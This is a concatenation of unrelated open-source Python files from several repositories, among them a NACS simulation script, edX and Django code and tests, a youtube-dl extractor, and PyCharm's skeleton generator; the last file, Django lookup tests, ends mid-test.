self.assertEqual(['Hello'], dispatcher.channel_events[2].messages)
self.assertFalse(3 in dispatcher.channel_events)
if __name__ == '__main__':
unittest.main()
# vi:sts=4 sw=4 et
|
cosailer/caeproject
|
refs/heads/master
|
simulation_result/1/project3_harmonic_sub.py
|
4
|
# -*- coding: utf-8 -*-
"""
-------------------------------------
N A C S P Y T H O N S C R I P T
-------------------------------------
NACS version: 2.0.2745 - pre3
NACS architecture: CENTOS 5.11 (X86_64)
File generated at Tue Jan 20 16:55:05 2015
On host 'lse86' by 'cae42'
"""
from __future__ import division
try:
from nacs.scripting import *
except:
raise Exception("File is only executable in the NACS python interpreter!")
# =================
# NACS SIMULATION
# =================
simulation = NacsSimulation()
simulation.setGrid(u'project3.nmf', 'plane')
simulation.addOutput(Output.Nacs())
text = Output.Text()
simulation.addOutput(text)
simulation.addOutput(Output.GiD())
# =====================
# MATERIAL DEFINITION
# =====================
copper = Material('Copper')
copper.density(8940.0)
copper.lossTangensDelta([1000],[0.002])
copper.stiffness.isotropic.byENu(1.15e+11, 0.35)
steel = Material('Steel')
steel.density(7850)
steel.lossTangensDelta([1000],[0.0003])
steel.stiffness.isotropic.byENu(1.95e+11, 0.28)
silicon = Material('Silicon')
silicon.density(2300.0)
silicon.stiffness.isotropic.byENu(67500000000.0, 0.1)
simulation.setMat('exc_f_r', copper)
simulation.setMat('rec_f_r', copper)
simulation.setMat('sen_coat_r', steel)
simulation.setMat('silicon_r', silicon)
# ===============
# ANALYSIS STEP
# ===============
harm1 = Analysis.Harmonic()
harm1.set(1, 1373000000.0, 1373000000.0, 'log')
mech1 = Physic.Mechanic('planeStrain')
mech1.addRegions(['exc_f_r', 'sen_coat_r', 'silicon_r', 'rec_f_r'])
mech1.addBc(mech1.BC.Force.expr('exc_f_r', 'y', "-1000"))
mech1.addBc(mech1.BC.Fix('outerbounds_bot', ['x', 'y']))
mech1.addResult(mech1.Result.Displacement(['exc_f_r', 'rec_f_r', 'sen_coat_r', 'silicon_r']))
mech1.addResult(mech1.Result.Displacement(['observer_point_1', 'observer_point_2', 'observer_point_3', 'observer_point_4', 'observer_point_e4'], 'amplPhase', 'mesh', [text]))
harm1.addPhysic(mech1)
simulation.addAnalysis(harm1)
|
kpanic/lymph
|
refs/heads/master
|
iris/events/null.py
|
1
|
from iris.events.base import BaseEventSystem
class NullEventSystem(BaseEventSystem):
def emit(self, container, event):
pass
|
jefftc/changlab
|
refs/heads/master
|
Betsy/Betsy/modules/merge_class0_class1_signal_signal.py
|
1
|
from Module import AbstractModule
class Module(AbstractModule):
def __init__(self):
AbstractModule.__init__(self)
def run(
self, network, antecedents, out_attributes, user_options, num_cores,
outfile):
"""merge three signal file to generate a joined signal file"""
import os
from Betsy import module_utils
merge_node1, merge_node2 = antecedents
assert os.path.exists(merge_node1.identifier), \
'File not found: %s' % merge_node1.identifier
assert os.path.exists(merge_node2.identifier), \
'File not found: %s' % merge_node2.identifier
file1, file2 = module_utils.convert_to_same_platform(
merge_node1.identifier, merge_node2.identifier)
f = file(outfile, 'w')
module_utils.merge_two_files(file1, file2, f)
f.close()
def name_outfile(self, antecedents, user_options):
from Betsy import module_utils
data_node1, data_node2 = antecedents
original_file = module_utils.get_inputid(data_node1.identifier)
filename = 'signal_merge' + original_file + '.tdf'
return filename
|
Stargrazer82301/CAAPR
|
refs/heads/master
|
CAAPR/CAAPR_AstroMagic/PTS/pts/modeling/config/prepare_data.py
|
1
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
# Import the relevant PTS classes and modules
from pts.core.basics.configuration import ConfigurationDefinition
# -----------------------------------------------------------------
# Create the configuration
definition = ConfigurationDefinition()
# Add required arguments
definition.add_required("image", str, "the name of the image for which to run the preparation")
# Add optional arguments
definition.add_optional("reference_image", str, "the name of the reference image")
definition.add_flag("steps", "write the results of intermediate steps")
definition.add_flag("visualise", "make visualisations")
#config.add_section("importation")
#config.add_section("preparation")
# -----------------------------------------------------------------
|
sawirah/OD8
|
refs/heads/master
|
themes/custom/ocelot_d8/node_modules/utf8/tests/generate-test-data.py
|
1788
|
#!/usr/bin/env python
import re
import json
# https://mathiasbynens.be/notes/javascript-encoding#surrogate-formulae
# http://stackoverflow.com/a/13436167/96656
def unisymbol(codePoint):
if codePoint >= 0x0000 and codePoint <= 0xFFFF:
return unichr(codePoint)
elif codePoint >= 0x010000 and codePoint <= 0x10FFFF:
highSurrogate = int((codePoint - 0x10000) / 0x400) + 0xD800
lowSurrogate = int((codePoint - 0x10000) % 0x400) + 0xDC00
return unichr(highSurrogate) + unichr(lowSurrogate)
else:
return 'Error'
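# Worked example of the surrogate formulae above: for U+1D306,
# codePoint - 0x10000 = 0xD306, so the high surrogate is
# 0xD800 + 0xD306 // 0x400 = 0xD834 and the low surrogate is
# 0xDC00 + 0xD306 % 0x400 = 0xDF06, i.e. unisymbol(0x1D306) returns the
# pair U+D834 U+DF06.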
def hexify(codePoint):
return 'U+' + hex(codePoint)[2:].upper().zfill(6)
def writeFile(filename, contents):
print filename
with open(filename, 'w') as f:
f.write(contents.strip() + '\n')
data = []
for codePoint in range(0x000000, 0x10FFFF + 1):
# Skip non-scalar values.
if codePoint >= 0xD800 and codePoint <= 0xDFFF:
continue
symbol = unisymbol(codePoint)
# http://stackoverflow.com/a/17199950/96656
bytes = symbol.encode('utf8').decode('latin1')
data.append({
'codePoint': codePoint,
'decoded': symbol,
'encoded': bytes
});
jsonData = json.dumps(data, sort_keys=False, indent=2, separators=(',', ': '))
# Use tabs instead of double spaces for indentation
jsonData = jsonData.replace(' ', '\t')
# Escape hexadecimal digits in escape sequences
jsonData = re.sub(
r'\\u([a-fA-F0-9]{4})',
lambda match: r'\u{}'.format(match.group(1).upper()),
jsonData
)
writeFile('data.json', jsonData)
|
roisagiv/webrtc-ios
|
refs/heads/master
|
tools/gyp/test/variables/commands/gyptest-commands-repeated.py
|
14
|
#!/usr/bin/env python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Test variable expansion of '<!()' syntax commands where they are evaluated
more than once.
"""
import os
import TestGyp
test = TestGyp.TestGyp(format='gypd')
expect = test.read('commands-repeated.gyp.stdout').replace('\r', '')
# Set $HOME so that gyp doesn't read the user's actual
# ~/.gyp/include.gypi file, which may contain variables
# and other settings that would change the output.
os.environ['HOME'] = test.workpath()
test.run_gyp('commands-repeated.gyp',
'--debug', 'variables', '--debug', 'general',
stdout=expect)
# Verify the commands-repeated.gypd against the checked-in expected contents.
#
# Normally, we should canonicalize line endings in the expected
# contents file setting the Subversion svn:eol-style to native,
# but that would still fail if multiple systems are sharing a single
# workspace on a network-mounted file system. Consequently, we
# massage the Windows line endings ('\r\n') in the output to the
# checked-in UNIX endings ('\n').
contents = test.read('commands-repeated.gypd').replace('\r', '')
expect = test.read('commands-repeated.gypd.golden').replace('\r', '')
if not test.match(contents, expect):
print "Unexpected contents of `commands-repeated.gypd'"
test.diff(expect, contents, 'commands-repeated.gypd ')
test.fail_test()
test.pass_test()
|
a-parhom/edx-platform
|
refs/heads/master
|
common/lib/xmodule/xmodule/modulestore/search.py
|
18
|
''' useful functions for finding content and its position '''
from logging import getLogger
from .exceptions import (ItemNotFoundError, NoPathToItem)
LOGGER = getLogger(__name__)
def path_to_location(modulestore, usage_key, full_path=False):
'''
Try to find a course_id/chapter/section[/position] path to location in
modulestore. The courseware insists that the first level in the course is
a chapter, but any kind of module can be a "section".
Args:
modulestore: which store holds the relevant objects
usage_key: :class:`UsageKey` the id of the location to which to generate the path
full_path: :class:`Bool` if True, return the full path to location. Default is False.
Raises
ItemNotFoundError if the location doesn't exist.
NoPathToItem if the location exists, but isn't accessible via
a chapter/section path in the course(s) being searched.
Returns:
a tuple (course_id, chapter, section, position) suitable for the
courseware index view.
If the section is a sequential or vertical, position will be the children index
of this location under that sequence.
'''
def flatten(xs):
'''Convert lisp-style (a, (b, (c, ()))) list into a python list.
Not a general flatten function. '''
p = []
while xs != ():
p.append(xs[0])
xs = xs[1]
return p
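        # Illustration of the shape this expects:
        # flatten(('a', ('b', ('c', ())))) == ['a', 'b', 'c']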
def find_path_to_course():
'''Find a path up the location graph to a node with the
specified category.
If no path exists, return None.
If a path exists, return it as a tuple with root location first, and
the target location last.
'''
# Standard DFS
# To keep track of where we came from, the work queue has
# tuples (location, path-so-far). To avoid lots of
# copying, the path-so-far is stored as a lisp-style
# list--nested hd::tl tuples, and flattened at the end.
queue = [(usage_key, ())]
while len(queue) > 0:
(next_usage, path) = queue.pop() # Takes from the end
# get_parent_location raises ItemNotFoundError if location isn't found
parent = modulestore.get_parent_location(next_usage)
# print 'Processing loc={0}, path={1}'.format(next_usage, path)
if next_usage.block_type == "course":
# Found it!
path = (next_usage, path)
return flatten(path)
elif parent is None:
# Orphaned item.
return None
# otherwise, add parent locations at the end
newpath = (next_usage, path)
queue.append((parent, newpath))
with modulestore.bulk_operations(usage_key.course_key):
if not modulestore.has_item(usage_key):
raise ItemNotFoundError(usage_key)
path = find_path_to_course()
if path is None:
raise NoPathToItem(usage_key)
if full_path:
return path
n = len(path)
course_id = path[0].course_key
# pull out the location names
chapter = path[1].block_id if n > 1 else None
section = path[2].block_id if n > 2 else None
vertical = path[3].block_id if n > 3 else None
# Figure out the position
position = None
# This block of code will find the position of a module within a nested tree
# of modules. If a problem is on tab 2 of a sequence that's on tab 3 of a
# sequence, the resulting position is 3_2. However, no positional modules
# (e.g. sequential and videosequence) currently deal with this form of
# representing nested positions. This needs to happen before jumping to a
# module nested in more than one positional module will work.
if n > 3:
position_list = []
for path_index in range(2, n - 1):
category = path[path_index].block_type
if category == 'sequential' or category == 'videosequence':
section_desc = modulestore.get_item(path[path_index])
# this calls get_children rather than just children b/c old mongo includes private children
# in children but not in get_children
child_locs = [c.location for c in section_desc.get_children()]
# positions are 1-indexed, and should be strings to be consistent with
# url parsing.
position_list.append(str(child_locs.index(path[path_index + 1]) + 1))
position = "_".join(position_list)
return (course_id, chapter, section, vertical, position, path[-1])
def navigation_index(position):
"""
Get the navigation index from the position argument (where the position argument was received from a call to
path_to_location)
Argument:
position - the position value returned from a call to path_to_location. This is an underscore (_) separated string
of 1-indexed vertical positions. If the course is built in Studio you will never see verticals as children of
verticals, so in practice only the first vertical shows up as a plain integer position. Only the topmost item needs
to be located here because that is the position actually required by the LMS navigation / breadcrumbs code.
Returns:
1-based integer of the position of the desired item within the vertical
"""
if position is None:
return None
try:
navigation_position = int(position.split('_', 1)[0])
except (ValueError, TypeError):
LOGGER.exception(u'Bad position %r passed to navigation_index, will assume first position', position)
navigation_position = 1
return navigation_position
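# Usage sketch, following the parsing above: navigation_index('3_2')
# returns 3, navigation_index(None) returns None, and a malformed position
# such as 'abc' is logged and falls back to 1.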
|
aboutsajjad/Bridge
|
refs/heads/master
|
app_packages/youtube_dl/extractor/slutload.py
|
5
|
from __future__ import unicode_literals
import re
from .common import InfoExtractor
class SlutloadIE(InfoExtractor):
_VALID_URL = r'^https?://(?:\w+\.)?slutload\.com/video/[^/]+/(?P<id>[^/]+)/?$'
_TESTS = [{
'url': 'http://www.slutload.com/video/virginie-baisee-en-cam/TD73btpBqSxc/',
'md5': '868309628ba00fd488cf516a113fd717',
'info_dict': {
'id': 'TD73btpBqSxc',
'ext': 'mp4',
'title': 'virginie baisee en cam',
'age_limit': 18,
'thumbnail': r're:https?://.*?\.jpg'
}
}, {
# mobile site
'url': 'http://mobile.slutload.com/video/masturbation-solo/fviFLmc6kzJ/',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
desktop_url = re.sub(r'^(https?://)mobile\.', r'\1', url)
webpage = self._download_webpage(desktop_url, video_id)
video_title = self._html_search_regex(r'<h1><strong>([^<]+)</strong>',
webpage, 'title').strip()
video_url = self._html_search_regex(
r'(?s)<div id="vidPlayer"\s+data-url="([^"]+)"',
webpage, 'video URL')
thumbnail = self._html_search_regex(
r'(?s)<div id="vidPlayer"\s+.*?previewer-file="([^"]+)"',
webpage, 'thumbnail', fatal=False)
return {
'id': video_id,
'url': video_url,
'title': video_title,
'thumbnail': thumbnail,
'age_limit': 18
}
|
izonder/intellij-community
|
refs/heads/master
|
python/helpers/generator3.py
|
37
|
# encoding: utf-8
import atexit
import zipfile
# TODO: Move all CLR-specific functions to clr_tools
from pycharm_generator_utils.module_redeclarator import *
from pycharm_generator_utils.util_methods import *
from pycharm_generator_utils.constants import *
from pycharm_generator_utils.clr_tools import *
debug_mode = False
def redo_module(module_name, outfile, module_file_name, doing_builtins):
# gobject does 'del _gobject' in its __init__.py, so the chained attribute lookup code
# fails to find 'gobject._gobject'. thus we need to pull the module directly out of
# sys.modules
mod = sys.modules.get(module_name)
mod_path = module_name.split('.')
if not mod and sys.platform == 'cli':
# "import System.Collections" in IronPython 2.7 doesn't actually put System.Collections in sys.modules
# instead, sys.modules['System'] get set to a Microsoft.Scripting.Actions.NamespaceTracker and Collections can be
# accessed as its attribute
mod = sys.modules[mod_path[0]]
for component in mod_path[1:]:
try:
mod = getattr(mod, component)
except AttributeError:
mod = None
report("Failed to find CLR module " + module_name)
break
if mod:
action("restoring")
r = ModuleRedeclarator(mod, outfile, module_file_name, doing_builtins=doing_builtins)
r.redo(module_name, ".".join(mod_path[:-1]) in MODULES_INSPECT_DIR)
action("flushing")
r.flush()
else:
report("Failed to find imported module in sys.modules " + module_name)
# find_binaries functionality
def cut_binary_lib_suffix(path, f):
"""
@param path where f lives
@param f file name of a possible binary lib file (no path)
@return f without a binary suffix (that is, an importable name) if path+f is indeed a binary lib, or None.
Note: if a corresponding .py file is found for a .pyc or .pyo file, None is returned.
"""
if not f.endswith(".pyc") and not f.endswith(".typelib") and not f.endswith(".pyo") and not f.endswith(".so") and not f.endswith(".pyd"):
return None
ret = None
match = BIN_MODULE_FNAME_PAT.match(f)
if match:
ret = match.group(1)
modlen = len('module')
retlen = len(ret)
if ret.endswith('module') and retlen > modlen and f.endswith('.so'): # what for?
ret = ret[:(retlen - modlen)]
if f.endswith('.pyc') or f.endswith('.pyo'):
fullname = os.path.join(path, f[:-1]) # check for __pycache__ is made outside
if os.path.exists(fullname):
ret = None
pat_match = TYPELIB_MODULE_FNAME_PAT.match(f)
if pat_match:
ret = "gi.repository." + pat_match.group(1)
return ret
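# Illustrative behaviour, assuming the usual CPython naming conventions that
# BIN_MODULE_FNAME_PAT is written for (the patterns live in
# pycharm_generator_utils.constants and are not shown here):
# 'foo.so' -> 'foo', 'foomodule.so' -> 'foo' (the trailing 'module' is cut),
# 'foo.pyc' -> None when a sibling 'foo.py' exists, and a .typelib file maps
# to 'gi.repository.' plus whatever the typelib pattern captures.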
def is_posix_skipped_module(path, f):
if os.name == 'posix':
name = os.path.join(path, f)
for mod in POSIX_SKIP_MODULES:
if name.endswith(mod):
return True
return False
def is_mac_skipped_module(path, f):
fullname = os.path.join(path, f)
m = MAC_STDLIB_PATTERN.match(fullname)
if not m: return 0
relpath = m.group(2)
for module in MAC_SKIP_MODULES:
if relpath.startswith(module): return 1
return 0
def is_skipped_module(path, f):
return is_mac_skipped_module(path, f) or is_posix_skipped_module(path, f[:f.rindex('.')]) or 'pynestkernel' in f
def is_module(d, root):
return (os.path.exists(os.path.join(root, d, "__init__.py")) or
os.path.exists(os.path.join(root, d, "__init__.pyc")) or
os.path.exists(os.path.join(root, d, "__init__.pyo")))
def walk_python_path(path):
for root, dirs, files in os.walk(path):
if root.endswith('__pycache__'):
continue
dirs_copy = list(dirs)
for d in dirs_copy:
if d.endswith('__pycache__') or not is_module(d, root):
dirs.remove(d)
# some files show up but are actually non-existent symlinks
yield root, [f for f in files if os.path.exists(os.path.join(root, f))]
def list_binaries(paths):
"""
Finds binaries in the given list of paths.
Understands nested paths, as sys.path has them (both "a/b" and "a/b/c").
Tries to be case-insensitive, but case-preserving.
@param paths: list of paths.
@return: list of (module_name, full_path, size, last_modified) tuples
"""
SEP = os.path.sep
res = {} # {name.upper(): (name, full_path)} # b/c windows is case-oblivious
if not paths:
return {}
if IS_JAVA: # jython can't have binary modules
return {}
paths = sorted_no_case(paths)
for path in paths:
if path == os.path.dirname(sys.argv[0]): continue
for root, files in walk_python_path(path):
cutpoint = path.rfind(SEP)
if cutpoint > 0:
preprefix = path[(cutpoint + len(SEP)):] + '.'
else:
preprefix = ''
prefix = root[(len(path) + len(SEP)):].replace(SEP, '.')
if prefix:
prefix += '.'
note("root: %s path: %s prefix: %s preprefix: %s", root, path, prefix, preprefix)
for f in files:
name = cut_binary_lib_suffix(root, f)
if name and not is_skipped_module(root, f):
note("cutout: %s", name)
if preprefix:
note("prefixes: %s %s", prefix, preprefix)
pre_name = (preprefix + prefix + name).upper()
if pre_name in res:
res.pop(pre_name) # there might be a dupe, if paths got both a/b and a/b/c
note("done with %s", name)
the_name = prefix + name
file_path = os.path.join(root, f)
res[the_name.upper()] = (the_name, file_path, os.path.getsize(file_path), int(os.stat(file_path).st_mtime))
return list(res.values())
def list_sources(paths):
#noinspection PyBroadException
try:
for path in paths:
if path == os.path.dirname(sys.argv[0]): continue
path = os.path.normpath(path)
if path.endswith('.egg') and os.path.isfile(path):
say("%s\t%s\t%d", path, path, os.path.getsize(path))
for root, files in walk_python_path(path):
for name in files:
if name.endswith('.py'):
file_path = os.path.join(root, name)
say("%s\t%s\t%d", os.path.normpath(file_path), path, os.path.getsize(file_path))
say('END')
sys.stdout.flush()
except:
import traceback
traceback.print_exc()
sys.exit(1)
#noinspection PyBroadException
def zip_sources(zip_path):
if not os.path.exists(zip_path):
os.makedirs(zip_path)
zip_filename = os.path.normpath(os.path.sep.join([zip_path, "skeletons.zip"]))
try:
zip = zipfile.ZipFile(zip_filename, 'w', zipfile.ZIP_DEFLATED)
except:
zip = zipfile.ZipFile(zip_filename, 'w')
try:
try:
while True:
line = sys.stdin.readline()
line = line.strip()
if line == '-':
break
if line:
# This line will break the split:
# /.../dist-packages/setuptools/script template (dev).py setuptools/script template (dev).py
split_items = line.split()
if len(split_items) > 2:
match_two_files = re.match(r'^(.+\.py)\s+(.+\.py)$', line)
if not match_two_files:
report("Error(zip_sources): invalid line '%s'" % line)
continue
split_items = match_two_files.group(1, 2)
(path, arcpath) = split_items
zip.write(path, arcpath)
else:
# busy waiting for input from PyCharm...
time.sleep(0.10)
say('OK: ' + zip_filename)
sys.stdout.flush()
except:
import traceback
traceback.print_exc()
say('Error creating archive.')
sys.exit(1)
finally:
zip.close()
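# The stdin protocol consumed above, illustrated: each line carries
# "<source path> <path inside the archive>", a lone '-' terminates the
# stream, and a blank line makes the loop sleep briefly while busy-waiting
# for more input from PyCharm. For example:
# /usr/lib/python2.7/os.py os.py
# -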
# command-line interface
#noinspection PyBroadException
def process_one(name, mod_file_name, doing_builtins, subdir):
"""
Processes a single module named name defined in file_name (autodetect if not given).
Returns True on success.
"""
if has_regular_python_ext(name):
report("Ignored a regular Python file %r", name)
return True
if not quiet:
say(name)
sys.stdout.flush()
action("doing nothing")
try:
fname = build_output_name(subdir, name)
action("opening %r", fname)
old_modules = list(sys.modules.keys())
imported_module_names = []
class MyFinder:
#noinspection PyMethodMayBeStatic
def find_module(self, fullname, path=None):
if fullname != name:
imported_module_names.append(fullname)
return None
my_finder = None
if hasattr(sys, 'meta_path'):
my_finder = MyFinder()
sys.meta_path.append(my_finder)
else:
imported_module_names = None
action("importing")
__import__(name) # sys.modules will fill up with what we want
if my_finder:
sys.meta_path.remove(my_finder)
if imported_module_names is None:
imported_module_names = [m for m in sys.modules.keys() if m not in old_modules]
redo_module(name, fname, mod_file_name, doing_builtins)
# The C library may have called Py_InitModule() multiple times to define several modules (gtk._gtk and gtk.gdk);
# restore all of them
path = name.split(".")
redo_imports = not ".".join(path[:-1]) in MODULES_INSPECT_DIR
if imported_module_names and redo_imports:
for m in sys.modules.keys():
if m.startswith("pycharm_generator_utils"): continue
action("looking at possible submodule %r", m)
# if module has __file__ defined, it has Python source code and doesn't need a skeleton
if m not in old_modules and m not in imported_module_names and m != name and not hasattr(
sys.modules[m], '__file__'):
if not quiet:
say(m)
sys.stdout.flush()
fname = build_output_name(subdir, m)
action("opening %r", fname)
try:
redo_module(m, fname, mod_file_name, doing_builtins)
finally:
action("closing %r", fname)
except:
exctype, value = sys.exc_info()[:2]
msg = "Failed to process %r while %s: %s"
args = name, CURRENT_ACTION, str(value)
report(msg, *args)
if debug_mode:
if sys.platform == 'cli':
import traceback
traceback.print_exc(file=sys.stderr)
raise
return False
return True
def get_help_text():
return (
#01234567890123456789012345678901234567890123456789012345678901234567890123456789
'Generates interface skeletons for python modules.' '\n'
'Usage: ' '\n'
' generator [options] [module_name [file_name]]' '\n'
' generator [options] -L ' '\n'
'module_name is fully qualified, and file_name is where the module is defined.' '\n'
'E.g. foo.bar /usr/lib/python/foo_bar.so' '\n'
'For built-in modules file_name is not provided.' '\n'
'Output files will be named as modules plus ".py" suffix.' '\n'
'Normally every name processed will be printed and stdout flushed.' '\n'
'directory_list is a single string of directories separated by the OS-specific path separator.' '\n'
'\n'
'Options are:' '\n'
' -h -- prints this help message.' '\n'
' -d dir -- output dir, must be writable. If not given, current dir is used.' '\n'
' -b -- use names from sys.builtin_module_names' '\n'
' -q -- quiet, do not print anything on stdout. Errors still go to stderr.' '\n'
' -x -- die on exceptions with a stacktrace; only for debugging.' '\n'
' -v -- be verbose, print lots of debug output to stderr' '\n'
' -c modules -- import CLR assemblies with specified names' '\n'
' -p -- run CLR profiler ' '\n'
' -s path_list -- add paths to sys.path before run; path_list lists directories' '\n'
' separated by path separator char, e.g. "c:\\foo;d:\\bar;c:\\with space"' '\n'
' -L -- print version and then a list of binary module files found ' '\n'
' on sys.path and in directories in directory_list;' '\n'
' lines are "qualified.module.name /full/path/to/module_file.{pyd,dll,so}"' '\n'
' -S -- lists all python sources found in sys.path and in directories in directory_list\n'
' -z archive_name -- zip files to archive_name. Accepts files to be archived from stdin in format <filepath> <name in archive>'
)
if __name__ == "__main__":
from getopt import getopt
helptext = get_help_text()
opts, args = getopt(sys.argv[1:], "d:hbqxvc:ps:LSz")
opts = dict(opts)
quiet = '-q' in opts
_is_verbose = '-v' in opts
subdir = opts.get('-d', '')
if not opts or '-h' in opts:
say(helptext)
sys.exit(0)
if '-L' not in opts and '-b' not in opts and '-S' not in opts and not args:
report("Neither -L nor -b nor -S nor any module name given")
sys.exit(1)
if "-x" in opts:
debug_mode = True
# patch sys.path?
extra_path = opts.get('-s', None)
if extra_path:
source_dirs = extra_path.split(os.path.pathsep)
for p in source_dirs:
if p and p not in sys.path:
sys.path.append(p) # we need this to make things in additional dirs importable
note("Altered sys.path: %r", sys.path)
# find binaries?
if "-L" in opts:
if len(args) > 0:
report("Expected no args with -L, got %d args", len(args))
sys.exit(1)
say(VERSION)
results = list(list_binaries(sys.path))
results.sort()
for name, path, size, last_modified in results:
say("%s\t%s\t%d\t%d", name, path, size, last_modified)
sys.exit(0)
if "-S" in opts:
if len(args) > 0:
report("Expected no args with -S, got %d args", len(args))
sys.exit(1)
say(VERSION)
list_sources(sys.path)
sys.exit(0)
if "-z" in opts:
if len(args) != 1:
report("Expected 1 arg with -z, got %d args", len(args))
sys.exit(1)
zip_sources(args[0])
sys.exit(0)
# build skeleton(s)
timer = Timer()
# determine names
if '-b' in opts:
if args:
report("No names should be specified with -b")
sys.exit(1)
names = list(sys.builtin_module_names)
if BUILTIN_MOD_NAME not in names:
names.append(BUILTIN_MOD_NAME)
if '__main__' in names:
names.remove('__main__') # we don't want ourselves processed
ok = True
for name in names:
ok = process_one(name, None, True, subdir) and ok
if not ok:
sys.exit(1)
else:
if len(args) > 2:
report("Only module_name or module_name and file_name should be specified; got %d args", len(args))
sys.exit(1)
name = args[0]
if len(args) == 2:
mod_file_name = args[1]
else:
mod_file_name = None
if sys.platform == 'cli':
#noinspection PyUnresolvedReferences
import clr
refs = opts.get('-c', '')
if refs:
for ref in refs.split(';'): clr.AddReferenceByPartialName(ref)
if '-p' in opts:
atexit.register(print_profile)
# We take module name from import statement
name = get_namespace_by_name(name)
if not process_one(name, mod_file_name, False, subdir):
sys.exit(1)
say("Generation completed in %d ms", timer.elapsed())
|
baylee/django
|
refs/heads/master
|
tests/lookup/tests.py
|
27
|
from __future__ import unicode_literals
import collections
from datetime import datetime
from operator import attrgetter
from unittest import skipUnless
from django.core.exceptions import FieldError
from django.db import connection
from django.test import (
TestCase, TransactionTestCase, ignore_warnings, skipUnlessDBFeature,
)
from django.utils.deprecation import RemovedInDjango20Warning
from .models import Article, Author, Game, MyISAMArticle, Player, Season, Tag
class LookupTests(TestCase):
def setUp(self):
# Create a few Authors.
self.au1 = Author.objects.create(name='Author 1')
self.au2 = Author.objects.create(name='Author 2')
# Create a couple of Articles.
self.a1 = Article.objects.create(headline='Article 1', pub_date=datetime(2005, 7, 26), author=self.au1)
self.a2 = Article.objects.create(headline='Article 2', pub_date=datetime(2005, 7, 27), author=self.au1)
self.a3 = Article.objects.create(headline='Article 3', pub_date=datetime(2005, 7, 27), author=self.au1)
self.a4 = Article.objects.create(headline='Article 4', pub_date=datetime(2005, 7, 28), author=self.au1)
self.a5 = Article.objects.create(headline='Article 5', pub_date=datetime(2005, 8, 1, 9, 0), author=self.au2)
self.a6 = Article.objects.create(headline='Article 6', pub_date=datetime(2005, 8, 1, 8, 0), author=self.au2)
self.a7 = Article.objects.create(headline='Article 7', pub_date=datetime(2005, 7, 27), author=self.au2)
# Create a few Tags.
self.t1 = Tag.objects.create(name='Tag 1')
self.t1.articles.add(self.a1, self.a2, self.a3)
self.t2 = Tag.objects.create(name='Tag 2')
self.t2.articles.add(self.a3, self.a4, self.a5)
self.t3 = Tag.objects.create(name='Tag 3')
self.t3.articles.add(self.a5, self.a6, self.a7)
def test_exists(self):
# We can use .exists() to check that there are some articles in the database.
self.assertTrue(Article.objects.exists())
for a in Article.objects.all():
a.delete()
# There should be none now!
self.assertFalse(Article.objects.exists())
def test_lookup_int_as_str(self):
# Integer value can be queried using string
self.assertQuerysetEqual(Article.objects.filter(id__iexact=str(self.a1.id)),
['<Article: Article 1>'])
@skipUnlessDBFeature('supports_date_lookup_using_string')
def test_lookup_date_as_str(self):
# A date lookup can be performed using a string search
self.assertQuerysetEqual(
Article.objects.filter(pub_date__startswith='2005'),
[
'<Article: Article 5>',
'<Article: Article 6>',
'<Article: Article 4>',
'<Article: Article 2>',
'<Article: Article 3>',
'<Article: Article 7>',
'<Article: Article 1>',
]
)
def test_iterator(self):
# Each QuerySet gets iterator(), which is a generator that "lazily"
# returns results using database-level iteration.
self.assertIsInstance(Article.objects.iterator(), collections.Iterator)
self.assertQuerysetEqual(
Article.objects.iterator(),
[
'Article 5',
'Article 6',
'Article 4',
'Article 2',
'Article 3',
'Article 7',
'Article 1',
],
transform=attrgetter('headline')
)
# iterator() can be used on any QuerySet.
self.assertQuerysetEqual(
Article.objects.filter(headline__endswith='4').iterator(),
['Article 4'],
transform=attrgetter('headline'))
def test_count(self):
# count() returns the number of objects matching search criteria.
self.assertEqual(Article.objects.count(), 7)
self.assertEqual(Article.objects.filter(pub_date__exact=datetime(2005, 7, 27)).count(), 3)
self.assertEqual(Article.objects.filter(headline__startswith='Blah blah').count(), 0)
# count() should respect sliced query sets.
articles = Article.objects.all()
self.assertEqual(articles.count(), 7)
self.assertEqual(articles[:4].count(), 4)
self.assertEqual(articles[1:100].count(), 6)
self.assertEqual(articles[10:100].count(), 0)
# Date and date/time lookups can also be done with strings.
self.assertEqual(Article.objects.filter(pub_date__exact='2005-07-27 00:00:00').count(), 3)
def test_in_bulk(self):
# in_bulk() takes a list of IDs and returns a dictionary mapping IDs to objects.
arts = Article.objects.in_bulk([self.a1.id, self.a2.id])
self.assertEqual(arts[self.a1.id], self.a1)
self.assertEqual(arts[self.a2.id], self.a2)
self.assertEqual(
Article.objects.in_bulk(),
{
self.a1.id: self.a1,
self.a2.id: self.a2,
self.a3.id: self.a3,
self.a4.id: self.a4,
self.a5.id: self.a5,
self.a6.id: self.a6,
self.a7.id: self.a7,
}
)
self.assertEqual(Article.objects.in_bulk([self.a3.id]), {self.a3.id: self.a3})
self.assertEqual(Article.objects.in_bulk({self.a3.id}), {self.a3.id: self.a3})
self.assertEqual(Article.objects.in_bulk(frozenset([self.a3.id])), {self.a3.id: self.a3})
self.assertEqual(Article.objects.in_bulk((self.a3.id,)), {self.a3.id: self.a3})
self.assertEqual(Article.objects.in_bulk([1000]), {})
self.assertEqual(Article.objects.in_bulk([]), {})
self.assertEqual(Article.objects.in_bulk(iter([self.a1.id])), {self.a1.id: self.a1})
self.assertEqual(Article.objects.in_bulk(iter([])), {})
with self.assertRaises(TypeError):
Article.objects.in_bulk(headline__startswith='Blah')
def test_values(self):
# values() returns a list of dictionaries instead of object instances --
# and you can specify which fields you want to retrieve.
def identity(x):
return x
self.assertQuerysetEqual(
Article.objects.values('headline'),
[
{'headline': 'Article 5'},
{'headline': 'Article 6'},
{'headline': 'Article 4'},
{'headline': 'Article 2'},
{'headline': 'Article 3'},
{'headline': 'Article 7'},
{'headline': 'Article 1'},
],
transform=identity
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__exact=datetime(2005, 7, 27)).values('id'),
[{'id': self.a2.id}, {'id': self.a3.id}, {'id': self.a7.id}],
transform=identity
)
self.assertQuerysetEqual(
Article.objects.values('id', 'headline'),
[
{'id': self.a5.id, 'headline': 'Article 5'},
{'id': self.a6.id, 'headline': 'Article 6'},
{'id': self.a4.id, 'headline': 'Article 4'},
{'id': self.a2.id, 'headline': 'Article 2'},
{'id': self.a3.id, 'headline': 'Article 3'},
{'id': self.a7.id, 'headline': 'Article 7'},
